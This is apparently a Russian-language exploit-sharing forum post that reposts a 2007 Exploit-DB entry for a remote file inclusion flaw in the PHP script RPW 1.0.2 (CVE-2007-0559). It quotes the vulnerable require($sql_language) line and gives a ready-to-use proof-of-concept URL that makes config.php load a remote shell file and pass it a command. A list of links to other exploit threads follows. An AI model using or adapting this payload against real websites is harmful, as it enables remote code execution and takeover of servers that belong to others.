Exploit RPW 1.0.2 - 'config.php?sql_language' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3185
Проверка EDB
  1. Пройдено
Автор
3L3CTRIC-CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0559
Дата публикации
2007-01-24
Код: 
               _________________________________
      ________|                                 |________
      \       |         Dr Max Virus            |       /
       \      |                                 |      /
       /      |_________________________________|      \
      /___________)                         (___________\
------------------------------------------------------------------------------------------------------------------------
Script:RPW
Affected Version:1.0.2
Downlaoad&Victim:http://vlad.tepesch.free.fr/mods/rpw1.0.2.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (config.php)
Vul Code;
require($sql_language);
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/config.php?sql_language=shell.txt?&cmd=0wn3d By Dr 
Max Virus;
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-24]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)
Ответы
0
Просмотры
766
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config
Ответы
0
Просмотры
802
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NTPsec 1.1.2 - 'config' (Authenticated) Out-of-Bounds Write Denial of Service (PoC)
Ответы
0
Просмотры
634
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit KingCMS 0.6 - 'CONFIG[AdminPath]' Remote File Inclusion
Ответы
0
Просмотры
449
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Tagit! Tagit2b 2.1.B Build 2 - '/CONFIG/errmsg.inc.php?configpath' Remote File Inclusion
Ответы
0
Просмотры
426
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
Ответы
0
Просмотры
407
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
Ответы
0
Просмотры
391
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit HotNews 0.x - 'config[incdir]' Remote File Inclusion
Ответы
0
Просмотры
384
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
Ответы
0
Просмотры
375
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit TP-Link TD-W89 Config File Download / Exploiting the Host
Ответы
0
Просмотры
998
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу